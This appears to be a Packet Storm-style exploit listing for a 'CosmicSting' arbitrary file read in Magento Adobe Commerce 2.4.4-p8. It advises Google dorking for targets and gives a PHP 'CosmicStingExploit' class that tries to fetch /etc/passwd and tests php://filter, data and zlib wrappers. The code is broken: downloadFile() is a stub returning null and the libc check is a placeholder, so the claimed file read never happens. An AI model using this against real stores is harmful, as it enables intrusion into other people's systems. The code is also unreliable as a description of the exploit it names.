Share
## https://sploitus.com/exploit?id=PACKETSTORM:189476
=============================================================================================================================================
| # Title : Magento Adobe Commerce 2.4.4-p8 arbitrary file read Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 131.0.3 (64 bits) |
| # Vendor : https://experienceleague.adobe.com/en/docs/commerce-operations/release/notes/security-patches/2-4-4-patches |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] CosmicSting: Magento Arbitrary File Read in the iconv() function of glibc .
[+] save code as poc.php .
[+] Line 83 : set your target.
[+] USage : cmd => c:\www\test\php poc.php target.dz
[+] PayLoad :
<?php
class CosmicStingExploit {
private $targetUrl;
private $downloadFileTimeout = 10;
public function __construct($url) {
$this->targetUrl = $url;
}
public function check() {
echo "Setting up module...\n";
if ($this->checkMagento() && $this->checkPhpRequirements() && $this->checkLibcVersion()) {
echo "Exploit preconditions met. Target appears to be vulnerable.\n";
} else {
echo "Exploit preconditions not met. Target may be safe.\n";
}
}
private function checkMagento() {
$etcPassword = $this->downloadFile('/etc/passwd');
if ($etcPassword === null) {
echo "Unable to download /etc/passwd.\n";
return false;
} else {
echo "/etc/passwd downloaded successfully.\n";
return true;
}
}
private function checkPhpRequirements() {
$text = bin2hex(random_bytes(25));
$base64Text = base64_encode($text);
$dataWrapper = "data:text/plain;base64,{$base64Text}";
if ($this->downloadFile($dataWrapper) === $text) {
echo "Data wrapper is working.\n";
} else {
echo "Data wrapper not working.\n";
return false;
}
$filterWrapper = "php://filter//resource=data:text/plain;base64,{$base64Text}";
if ($this->downloadFile($filterWrapper) === $text) {
echo "Filter wrapper is working.\n";
} else {
echo "Filter wrapper not working.\n";
return false;
}
$compressedText = $this->compress($text);
$compressedBase64 = base64_encode($compressedText);
$zlibPath = "php://filter/zlib.inflate/resource=data:text/plain;base64,{$compressedBase64}";
if ($this->downloadFile($zlibPath) === $text) {
echo "Zlib extension is enabled.\n";
return true;
} else {
echo "Zlib extension not enabled.\n";
return false;
}
}
private function checkLibcVersion() {
// Placeholder for libc version check implementation
return true;
}
private function downloadFile($filePath) {
// This function should simulate a download attempt using HTTP requests
echo "Attempting to download {$filePath}\n";
// Placeholder to simulate download success or failure
return null; // Replace with actual download logic
}
private function compress($data) {
return gzdeflate($data, 9);
}
}
// Usage
$exploit = new CosmicStingExploit("http://target-application-url.com");
$exploit->check();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================